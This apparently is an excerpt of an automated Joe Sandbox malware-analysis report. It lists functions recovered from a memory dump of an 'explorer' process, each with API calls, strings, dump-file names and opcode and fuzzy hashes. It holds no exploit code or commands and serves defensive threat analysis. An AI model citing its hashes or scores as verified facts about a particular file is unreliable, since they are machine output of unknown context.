                          • Opcode Fuzzy Hash: c96244e9f482b777b6cf6b46924f9183bb55c1782275ffe7a1cfa5c86aa232a5
                          • Instruction Fuzzy Hash: 17117971654B4A91EB1CEB15F8D03E863A9EB68788F484125DB8D03764EB7DC286C780
                          Function 01198F40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegGetValueW.ADVAPI32 ref: 01198FC8
                          • LocalAlloc.KERNEL32 ref: 01198FE1
                          • RegGetValueW.ADVAPI32 ref: 01199034
                          • LocalFree.KERNEL32 ref: 01199058
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalValue$AllocFree_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s
                          • API String ID: 2638254995-297323700
                          • Opcode ID: a64576311c8b5d010abe15348bb567eed2cf1542a55aacb7b3dbe93d89b8c603
                          • Instruction ID: c13882084957849b9f30baa661a67915ad70851b74a3814c910d6e3629574877
                          • Opcode Fuzzy Hash: a64576311c8b5d010abe15348bb567eed2cf1542a55aacb7b3dbe93d89b8c603
                          • Instruction Fuzzy Hash: 74212A32208B8482EB249B59F49479EB7B4F785798F500229EBDD47BA8DF7EC145CB40
                          Function 011B5A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProcVersion
                          • String ID: NTDLL.DLL$RtlGetVersion
                          • API String ID: 2685220120-196638859
                          • Opcode ID: d8a7b21e71a6d189ec4ae80e8a695536de4575df490812d44e91965eea720e90
                          • Instruction ID: 83c3eac6ed790b71bff54f24c67163d03fa7524c8fe5811e62bbd2b434f13484
                          • Opcode Fuzzy Hash: d8a7b21e71a6d189ec4ae80e8a695536de4575df490812d44e91965eea720e90
                          • Instruction Fuzzy Hash: 6911E936269B8482E768DF14F8843DAB7A1F7C8B44F404529EB8A83768DF7CC555CB84
                          Function 01195A70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,0119108D), ref: 01195A7B
                          • GetProcAddress.KERNEL32 ref: 01195A9A
                          • FreeLibrary.KERNEL32 ref: 01195ABA
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: SetProcessDPIAware$USER32.DLL
                          • API String ID: 145871493-772676101
                          • Opcode ID: 33176821779897759245a29b6f8084905d367a68fd1873ee8b619ed668c400f9
                          • Instruction ID: 15875971b2eb7bb816fd5a1368ef1745be49901ef003c1f8426ac006b313a0e2
                          • Opcode Fuzzy Hash: 33176821779897759245a29b6f8084905d367a68fd1873ee8b619ed668c400f9
                          • Instruction Fuzzy Hash: 40F0A576554B9082E778DB18F88839977B0F7C8798F440615E78E42A68DF7CC298CB58
                          Function 011AE750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProcVersion
                          • String ID: NTDLL$RtlGetVersion
                          • API String ID: 3310240892-3678323915
                          • Opcode ID: 684692961d127836ff75429e094dc418e1e8dba0610ed999e0bde066ed8978ad
                          • Instruction ID: da3254c1551235c1300a7ee3226949c9759b5a4b3fb2e521323a6ef96c7f2ed7
                          • Opcode Fuzzy Hash: 684692961d127836ff75429e094dc418e1e8dba0610ed999e0bde066ed8978ad
                          • Instruction Fuzzy Hash: C2F07F36644A84C6EB78EB04F8883DAB7A0F388709F800124D78E467A8DF7CC559CF80
                          Function 011C2C50 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _fileno.LIBCMT ref: 011C2C6B
                            • Part of subcall function 011C046C: _errno.LIBCMT ref: 011C0475
                            • Part of subcall function 011C046C: _invalid_parameter_noinfo.LIBCMT ref: 011C0480
                          • _errno.LIBCMT ref: 011C2C7B
                          • _errno.LIBCMT ref: 011C2C99
                          • _isatty.LIBCMT ref: 011C2CFA
                          • _getbuf.LIBCMT ref: 011C2D06
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 2574049805-0
                          • Opcode ID: d89ba17164b057e40e0230c8c0e126811be590dc0c1f6fea6b6467d498727db7
                          • Instruction ID: b37788867bdbf5e581f6c4f2525a4760bc1e07aa25fc060362069e3f52c77d84
                          • Opcode Fuzzy Hash: d89ba17164b057e40e0230c8c0e126811be590dc0c1f6fea6b6467d498727db7
                          • Instruction Fuzzy Hash: 7141A1B2200B4187DB2C9F2DD48136D7761EBB4FA8F158229DA65473E8EB79C851C781
                          Function 011B9A64 Relevance: 7.6, APIs: 5, Instructions: 115COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _fileno.LIBCMT ref: 011B9A81
                            • Part of subcall function 011C046C: _errno.LIBCMT ref: 011C0475
                            • Part of subcall function 011C046C: _invalid_parameter_noinfo.LIBCMT ref: 011C0480
                          • _errno.LIBCMT ref: 011B9A91
                          • _errno.LIBCMT ref: 011B9AAD
                          • _isatty.LIBCMT ref: 011B9B0E
                          • _getbuf.LIBCMT ref: 011B9B1A
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 2574049805-0
                          • Opcode ID: 56ab89854e5ae769f29630560a6647f2ee0e2c817f8a69632cdb6a676603f6a7
                          • Instruction ID: d972a308b7d1f55826e4cbf24236a399f18923dfb5fc59bbb3550cf237aaa656
                          • Opcode Fuzzy Hash: 56ab89854e5ae769f29630560a6647f2ee0e2c817f8a69632cdb6a676603f6a7
                          • Instruction Fuzzy Hash: E841FFB2210B488ADF1C9F3DD4D06A87B60E798FACF554219DB6A473D5EB38C852C780
                          Function 011C1798 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000008,?,011C1953), ref: 011C17F2
                          • malloc.LIBCMT ref: 011C1856
                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000008,?,011C1953), ref: 011C189E
                          • GetStringTypeW.KERNEL32(?,?,?,00000000,?,00000008,?,011C1953), ref: 011C18B5
                          • free.LIBCMT ref: 011C18C9
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$StringTypefreemalloc
                          • String ID:
                          • API String ID: 307345228-0
                          • Opcode ID: 965fe8bdf943ed1d4c82f4e81ed16d9202ccaf85f4f541d8b62d894c124712f2
                          • Instruction ID: 1e9d4af1da5e16b0689ea0147d6aa74f4630ac0ca09a176cac87fdcda9bd2d8d
                          • Opcode Fuzzy Hash: 965fe8bdf943ed1d4c82f4e81ed16d9202ccaf85f4f541d8b62d894c124712f2
                          • Instruction Fuzzy Hash: C631A032744B80DAEB189F2A984039A6796FB98FF8F584219EE29477D5DF38C4018340
                          Function 011B27E4 Relevance: 7.6, APIs: 5, Instructions: 94threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                          • String ID:
                          • API String ID: 738346648-0
                          • Opcode ID: ad9b6ddeba1b68a4c7a9c77c2e9740dbed4c8849dfcb5610010ed651666c2a0a
                          • Instruction ID: 589e6b91a1f450d5f2f19b2dfcf62a6bcd16ad429d41013671984c3e15f7ea65
                          • Opcode Fuzzy Hash: ad9b6ddeba1b68a4c7a9c77c2e9740dbed4c8849dfcb5610010ed651666c2a0a
                          • Instruction Fuzzy Hash: E851F532205B00C5DB58CB18E8C13A9A3B1F7E8748F61952AE69F467B4EF7DD586CB00
                          Function 01193E60 Relevance: 7.6, APIs: 5, Instructions: 64COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • Concurrency::task_options::get_continuation_context.LIBCPMTD ref: 01193E89
                          • Concurrency::task_options::get_continuation_context.LIBCPMTD ref: 01193E9D
                          • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 01193EAD
                          • type_info::_name_internal_method.LIBCMTD ref: 01193ECF
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Concurrency::task_options::get_continuation_context$Affinity::operator!=Concurrency::details::Hardwaretype_info::_name_internal_method
                          • String ID:
                          • API String ID: 3678748506-0
                          • Opcode ID: afd68561e62c96723d4451579b545c313aa908728ce77bd132829953e4c85a52
                          • Instruction ID: d4b9298aec1ffa74c2b43db638351e67e945ab3471508b6024a3b0a3a0d9c6de
                          • Opcode Fuzzy Hash: afd68561e62c96723d4451579b545c313aa908728ce77bd132829953e4c85a52
                          • Instruction Fuzzy Hash: A221AA36228B4581CF18DB5AE49011EB771F7DABD8B604012EFAE87B28DF3AC551CB41
                          Function 011B4750 Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON
                          Download Yara Rule
                          APIs
                          • WSACreateEvent.WS2_32 ref: 011B4768
                          • WSAEventSelect.WS2_32 ref: 011B478F
                          • WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47E4
                          • WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47F3
                          • WSACloseEvent.WS2_32(?,?,?,?,?,?,?,011B455A), ref: 011B4859
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Close$CreateEventsMultipleSelectWait
                          • String ID:
                          • API String ID: 2166016019-0
                          • Opcode ID: fe6704b44bee5829474ada4c8b3fd0bec09b15791c55a24a43108b7d94ecef9f
                          • Instruction ID: bb2e3591794de7d25dabce1e2da19d3a1e789ee4e2e8f14da60a9f6e6d458863
                          • Opcode Fuzzy Hash: fe6704b44bee5829474ada4c8b3fd0bec09b15791c55a24a43108b7d94ecef9f
                          • Instruction Fuzzy Hash: B9310832528B84CADB559F19E48479ABBB0F385B84F109115FB9A43F6ACB7DC045CF01
                          Function 011B4630 Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON
                          Download Yara Rule
                          APIs
                          • WSACreateEvent.WS2_32 ref: 011B4648
                          • WSAEventSelect.WS2_32 ref: 011B466F
                          • WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46C4
                          • WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46D3
                          • WSACloseEvent.WS2_32(?,?,?,?,?,?,?,011B45A0), ref: 011B4739
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Close$CreateEventsMultipleSelectWait
                          • String ID:
                          • API String ID: 2166016019-0
                          • Opcode ID: 29ccdf6b33a1163324ee7db4502d6237d9ce27e33d28bec132fa8e2cb9d649a2
                          • Instruction ID: 829e91c64f0294f9ed4eaff8c4c5940348aa70880ef3cc5f6d104263ec9f9d96
                          • Opcode Fuzzy Hash: 29ccdf6b33a1163324ee7db4502d6237d9ce27e33d28bec132fa8e2cb9d649a2
                          • Instruction Fuzzy Hash: 8F31FA36128B44CADB69DF19E48479ABBB1F386784F609115EB8A43F69CB7DC045CF01
                          Function 01194050 Relevance: 7.5, APIs: 5, Instructions: 44threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$CloseEventHandle$Thread
                          • String ID:
                          • API String ID: 3315681087-0
                          • Opcode ID: c08934f3fb2d49f487da2c55ee1254e5b5f920426d6448e0e42077e6a3dbbbae
                          • Instruction ID: 22e2d7c8091fdfb5755504fddb30fd9a1ddba3e755fd96187b2920e356d62be1
                          • Opcode Fuzzy Hash: c08934f3fb2d49f487da2c55ee1254e5b5f920426d6448e0e42077e6a3dbbbae
                          • Instruction Fuzzy Hash: 3921D370600A0482FB2CEB65FA59BD636A0F354359F09663DDA5642EE0CFBD81EBC740
                          Function 011AB310 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event
                          • String ID:
                          • API String ID: 4201588131-0
                          • Opcode ID: c7270ca6cd0027a95c3a079b4d1d8a70d46683f4405f6999b971fa87d8febae7
                          • Instruction ID: 5c5c62325498c7401a28fd97be80d903f960f857e4ef682080ea0eabbbcd4edb
                          • Opcode Fuzzy Hash: c7270ca6cd0027a95c3a079b4d1d8a70d46683f4405f6999b971fa87d8febae7
                          • Instruction Fuzzy Hash: 5F212036608B88C7CB28DF09E49425AB7A1F7C8B99F505229EA8D47B29CB7CC555CF04
                          Function 011AAC80 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event
                          • String ID:
                          • API String ID: 4201588131-0
                          • Opcode ID: 2f43e1411a86ff65ae186fbf4826b3099ba5d0dc06b99c4c62602528d5f33b84
                          • Instruction ID: b8b44067b2317f145cdcd8ad31f962470e50e3d536c9dc324d050b1c9b4d8d50
                          • Opcode Fuzzy Hash: 2f43e1411a86ff65ae186fbf4826b3099ba5d0dc06b99c4c62602528d5f33b84
                          • Instruction Fuzzy Hash: 2C214276608B8887D728DF05F05435AB7A1F7C8B99F505229EA8D47B28CB7CC555CF40
                          Function 011BF734 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 011BF76B
                          • GetCurrentProcessId.KERNEL32 ref: 011BF776
                          • GetCurrentThreadId.KERNEL32 ref: 011BF782
                          • GetTickCount.KERNEL32 ref: 011BF78E
                          • QueryPerformanceCounter.KERNEL32 ref: 011BF79F
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
